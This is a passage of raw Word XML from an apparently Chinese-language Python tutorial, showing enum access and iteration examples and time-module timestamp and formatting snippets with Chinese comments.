        <w:t xml:space="preserve">: name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> "red", value </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D60FA9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    green = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A239632" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    blue = 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3245C0CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    red_alias = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39023AA3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2590419A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="475" w:name="_Toc159779918"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>枚举类型的访问</w:t>
      </w:r>
      <w:bookmarkEnd w:id="475"/>
    </w:p>
    <w:p w14:paraId="2A31883D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print(Color.red)            # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用枚举元素</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: Color.red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49445717" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print(Color["red"])         # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用枚举元素</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: Color.red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCDD968" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print(Color(1))             # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> value </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检索元素（返回最先匹配的元素）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: Color.red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1A52A2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print(type(Color.red))      # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>元素的类型为枚举类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Color, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: &lt;enum 'Color'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E0E140" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">print(type(Color))          # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>枚举类型的类型为类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> enum.EnumMeta, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: &lt;class 'enum.EnumMeta'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2E2A45" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Color.red.name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">)       # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: "red"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7918609F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Color.red.value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">)      # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373F9F82" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED71FDC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="476" w:name="_Toc159779919"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>遍历</w:t>
      </w:r>
      <w:bookmarkEnd w:id="476"/>
    </w:p>
    <w:p w14:paraId="3DEE0866" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>枚举元素的遍历，普通的遍历</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> value </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相同的元素只输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC503D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>for c in Color:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74319104" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(c)        # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逐次输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: Color.red</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9549F4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    #          Color.green</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7642E716" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                    #          Color.blue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA821D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70270FD7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="477" w:name="_Toc159779920"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:bookmarkEnd w:id="477"/>
    </w:p>
    <w:p w14:paraId="2597AA1C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="478" w:name="_Toc159779921"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间戳</w:t>
      </w:r>
      <w:bookmarkEnd w:id="478"/>
    </w:p>
    <w:p w14:paraId="4665C984" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F0A285" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">import time  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F97B2CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ticks = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B2CD7E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print ("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前时间戳为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:", ticks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B823A03" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="479" w:name="_Toc159779922"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>获取格式化时间</w:t>
      </w:r>
      <w:bookmarkEnd w:id="479"/>
    </w:p>
    <w:p w14:paraId="1DF83366" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="6C4F61E7" wp14:editId="3C6BC17F">
            <wp:extent cx="4261485" cy="2388235"/>
            <wp:effectExtent l="0" t="0" r="5715" b="4445"/>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149"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4261485" cy="2388235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB07943" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60290071" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2002C7B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B3A692" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>localtime = time.asctime( time.localtime(time.time()) )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7809FDA3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print ("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地时间为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> :", localtime)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325444CF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E096EF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="740B3194" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C79E40A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2E356B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式化成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016-03-20 11:45:39</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>形式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C3FEFF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381A4E29" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式化成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sat Mar 28 22:24:24 2016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>形式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64354658" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print (time.strftime("%a %b %d %H:%M:%S %Y", time.localtime()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD89ACC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将格式字符串转换为时间戳</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B7757B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a = "Sat Mar 28 22:24:24 2016"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23229C6B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print (time.mktime(time.strptime(a,"%a %b %d %H:%M:%S %Y")))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D77936" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4251B2E8" w14:textId="7079CFF6" w:rsidR="004C452C" w:rsidRDefault="007F5AC8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="480" w:name="_Toc159779923"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>atetime</w:t>
      </w:r>
      <w:bookmarkEnd w:id="480"/>
    </w:p>
    <w:p w14:paraId="216C32DD" w14:textId="77777777" w:rsidR="007F5AC8" w:rsidRDefault="007F5AC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C07A53F" w14:textId="77777777" w:rsidR="000B1360" w:rsidRDefault="000B1360" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1206AC25" w14:textId="071F62F1" w:rsidR="000B1360" w:rsidRDefault="000B1360" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="481" w:name="_Toc159779924"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取今天</w:t>
      </w:r>
      <w:bookmarkEnd w:id="481"/>
    </w:p>
    <w:p w14:paraId="0D7FE395" w14:textId="77777777" w:rsidR="000B1360" w:rsidRDefault="000B1360" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54980BA3" w14:textId="77777777" w:rsidR="00CD1BEA" w:rsidRDefault="00CD1BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68035B08" w14:textId="77777777" w:rsidR="00CD1BEA" w:rsidRDefault="00CD1BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>import calendar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C8348B" w14:textId="77777777" w:rsidR="00CD1BEA" w:rsidRDefault="00CD1BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07881042" w14:textId="14DF4701" w:rsidR="003E275A" w:rsidRDefault="003E275A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打印现在的时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E43D61B" w14:textId="45DD058F" w:rsidR="001B189C" w:rsidRDefault="001B189C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>localtime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D068E7" w14:textId="260917A6" w:rsidR="003E275A" w:rsidRDefault="001B189C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前程序时间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ", localtime)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFC80D0" w14:textId="77777777" w:rsidR="003E275A" w:rsidRDefault="003E275A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
